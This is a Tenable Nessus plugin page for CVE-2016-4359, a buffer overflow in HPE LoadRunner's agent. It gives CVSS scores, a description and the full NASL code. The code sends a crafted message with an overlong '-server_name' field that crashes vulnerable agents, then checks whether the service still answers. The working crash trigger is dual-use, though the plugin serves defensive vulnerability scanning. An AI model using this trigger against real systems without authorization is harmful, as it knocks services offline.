CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EPSS
Percentile
97.1%
The Hewlett Packard Enterprise (HPE) LoadRunner application running on the remote host is affected by a stack-based buffer overflow condition in mchan.dll, when constructing a shared memory file name, due to improper validation of the size of a user-supplied string. An unauthenticated, remote attacker can exploit this, via a long ‘-server_name’ value, to execute arbitrary code with the privileges of the user running the application.
Note that LoadRunner reportedly is affected by other vulnerabilities, which can result in a denial of service; however, Nessus has not tested for these.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
# Plugin registration: metadata only, no network activity happens in
# this branch. Nessus evaluates it with `description` set and exits at
# the bottom; the actual check is the MAIN section further down.
script_id(91972);
script_version("1.11");
script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");
script_cve_id("CVE-2016-4359");
script_xref(name:"ZDI", value:"ZDI-16-363");
script_xref(name:"HP", value:"HPSBGN03609");
script_xref(name:"HP", value:"PSRT110020");
script_xref(name:"HP", value:"emr_na-c05157423");
script_xref(name:"TRA", value:"TRA-2016-16");
script_name(english:"HPE LoadRunner Shared Memory Name Construction RCE");
script_set_attribute(attribute:"synopsis", value:
"A software performance testing application running on the remote host
is affected by a remote code execution vulnerability.");
script_set_attribute(attribute:"description", value:
"The Hewlett Packard Enterprise (HPE) LoadRunner application running
on the remote host is affected by a stack-based buffer overflow
condition in mchan.dll, when constructing a shared memory file name,
due to improper validation of the size of a user-supplied string. An
unauthenticated, remote attacker can exploit this, via a long
'-server_name' value, to execute arbitrary code with the privileges of
the user running the application.
Note that LoadRunner reportedly is affected by other vulnerabilities,
which can result in a denial of service; however, Nessus has not
tested for these.");
# https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-c05157423
script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?1dac9898");
script_set_attribute(attribute:"solution", value:
"Apply the appropriate patch or upgrade according to the vendor
advisory.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
script_set_cvss3_temporal_vector("CVSS:3.0/E:U/RL:O/RC:C");
script_set_attribute(attribute:"cvss_score_source", value:"CVE-2016-4359");
# "No known exploits" refers to public code-execution exploits; the
# check below only triggers the crash condition, it does not execute code.
script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
script_set_attribute(attribute:"exploit_available", value:"false");
script_set_attribute(attribute:"vuln_publication_date", value:"2016/06/01");
script_set_attribute(attribute:"patch_publication_date", value:"2016/05/31");
script_set_attribute(attribute:"plugin_publication_date", value:"2016/07/07");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/a:hp:loadrunner");
script_set_attribute(attribute:"thorough_tests", value:"true");
script_end_attributes();
# ACT_DENIAL: the detection in MAIN works by crashing a vulnerable agent
# and observing that it no longer answers, so this is a destructive
# check and is categorised accordingly.
script_category(ACT_DENIAL);
script_family(english:"Gain a shell remotely");
script_copyright(english:"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.");
# Relies on the agent detection plugin to identify the service; 54345 is
# the fallback port when no detected service is registered in the KB.
script_dependencies("loadrunner_agent_detect.nasl", "os_fingerprint.nasl");
script_require_ports("Services/loadrunner_agent", 54345);
exit(0);
}
include('audit.inc');
include('byte_func.inc');
include('global_settings.inc');
include('misc_func.inc');
include('dump.inc');
function mkdword_be()
{
  # Encode a 32-bit integer as a big-endian (network order) DWORD.
  # Takes one anonymous positional argument: the integer to encode.
  # Thin wrapper so the protocol builders below never spell out the
  # byte order themselves.
  return mkdword(_FCT_ANON_ARGS[0], order: BYTE_ORDER_BIG_ENDIAN);
}
function block(data, len, inclusive)
{
  # Length-prefixed blob: a big-endian DWORD length followed by data.
  #
  # data      - payload bytes
  # len       - explicit value for the length prefix; when NULL it is
  #             derived from data (supplying it lets a caller write a
  #             prefix that disagrees with the payload on purpose)
  # inclusive - when len is derived, also count the 4 prefix bytes;
  #             ignored when len is supplied explicitly
  local_var prefix_len;

  prefix_len = len;
  if (isnull(prefix_len))
  {
    prefix_len = strlen(data);
    if (inclusive) prefix_len = prefix_len + 4;
  }
  return mkdword_be(prefix_len) + data;
}
function xdr_string(s, len)
{
  # XDR-style opaque string: DWORD length, the bytes, then NUL padding
  # up to the next 4-byte boundary.
  #
  # s   - string to encode
  # len - optional explicit length prefix; when given, the string is
  #       emitted with that prefix and without padding (intentionally
  #       malformed output, as the original author allowed)
  local_var encoded, pad;

  if (!isnull(len))
    return block(data:s, len:len);

  encoded = block(data:s);
  # (4 - x % 4) % 4 yields 0..3 pad bytes; 0 when already aligned.
  pad = (4 - strlen(encoded) % 4) % 4;
  encoded += crap(data:'\x00', length:pad);
  return encoded;
}
#
# MAIN
#
# Detection strategy (destructive). Two connections are made:
#   1. A connection request carrying an over-long '-server_name' value
#      (the condition described in the plugin description) is sent.
#   2. A second connection runs an ordinary protocol exchange.
# A patched agent answers the second exchange; a crashed (vulnerable)
# agent does not. Because "no answer" is the vulnerable signal, any
# failure to connect or receive on the second connection is reported the
# same way — see the review note at the reporting branch below.
#
# It looks like only the Windows version is affected.
# If OS cannot be determined, proceed with the attack.
os = get_kb_item('Host/OS');
if (os && 'Windows' >!< os)
audit(AUDIT_OS_NOT, 'Windows');
# Make sure LoadRunner agent is detected
# exit_on_fail: audits out (no result) if no agent service is in the KB.
port = get_service(svc:'loadrunner_agent', exit_on_fail:TRUE);
# Attack is known to work on ENCAPS_IP, may also work on SSL.
# ENCAPS_IP = plain TCP; a TLS-wrapped agent is not probed by this plugin.
soc = open_sock_tcp(port, transport: ENCAPS_IP);
if (!soc) audit(AUDIT_SOCK_FAIL, port, 'TCP');
#
# Build the attack request
#
# Random per-run identifier; the same value is reused as the
# -guid_identifier of the follow-up probe so both requests are correlated.
guid = base64(str:rand_str(length:16));
blk1 = block(data: guid +"0");
# Message header
# Fixed header words; their field semantics are not documented in this
# plugin and are reproduced as-is.
hdr = mkdword_be(0x0d) +
mkdword_be(0x01) +
crap(data:'X',length:16) +
mkdword_be(0x00);
# Max size: 0x400 bytes
conn_str = "(-server_type=2)" +
"(-server_name=" + crap(data:'A', length:0x380) + ")";
# Message body
body = mkdword_be(0x06)+
xdr_string(s:conn_str) +
mkdword_be(0x7530);
# Framing: header and body each get an inclusive length prefix, then the
# pair is wrapped in one outer (exclusive) length block.
hdr = block(data:hdr, inclusive: TRUE);
body = block(data:body, inclusive: TRUE);
msg = block(data:hdr + body);
req = blk1 + msg;
send(socket:soc, data:req);
# Do not close socket right after the send.
# Doing so can prevent the remote service from
# processing the attack packet.
# The reply (if any) is not inspected; this recv only delays close().
res = recv(socket:soc, length:4096);
close(soc);
# Windows Error Report can pop up and the Agent process/service is
# not totally dead. It still can accept TCP connections.
# We try to run the LR agent protocol to get something back.
# A vulnerable service will not respond while a patched one will.
res = NULL;
soc = open_sock_tcp(port, transport: ENCAPS_IP);
if (soc)
{
# Pseudo process/thread ids for the registration string below.
pid = rand() % 0xffff;
tid = rand() % 0xffff;
server_name = "nessus";
# The scanner's own address and the local port of this socket, so the
# probe describes a plausible peer.
server_ip = compat::this_host();
server_port = get_source_port(soc);
conn_str = "(-server_type=8)" +
"(-server_name=" + server_name + ")" +
"(-server_full_name=" + server_name + ")" +
"(-server_ip_name=" + server_ip + ")" +
"(-server_port=" + server_port + ")" +
"(-server_fd_secondary=4)" +
"(-guid_identifier=" + guid + ")";
body = mkdword_be(0x0f)+
xdr_string(s: server_name + ";" + pid + ";" + tid) +
xdr_string(s:conn_str) +
mkdword_be(0x7530) +
mkdword_be(0x8);
# hdr is already the inclusive-length-wrapped header from above and is
# reused unchanged for the second message.
body = block(data:body, inclusive: TRUE);
msg = block(data:hdr + body);
req2 = blk1 + msg;
send(socket:soc, data:req2);
res = recv(socket:soc, length:4096);
close(soc);
}
if(res)
{
audit(AUDIT_LISTEN_NOT_VULN, 'HP LoadRunner Agent', port);
}
# Failed to connect or get a response
# NOTE(review): res is NULL both when the agent crashed and when the
# second connect or recv merely failed (firewall, agent restarting,
# timeout). No retry or error distinction is made, so on a flaky network
# this branch can report a false positive; the audit above is the only
# path that proves the host is patched.
else
{
# The request attached to the finding is the crash trigger (req), not
# the follow-up probe (req2).
security_report_v4(
port: port,
severity: SECURITY_HOLE,
generic: TRUE,
request: make_list(hexdump(ddata:req))
);
}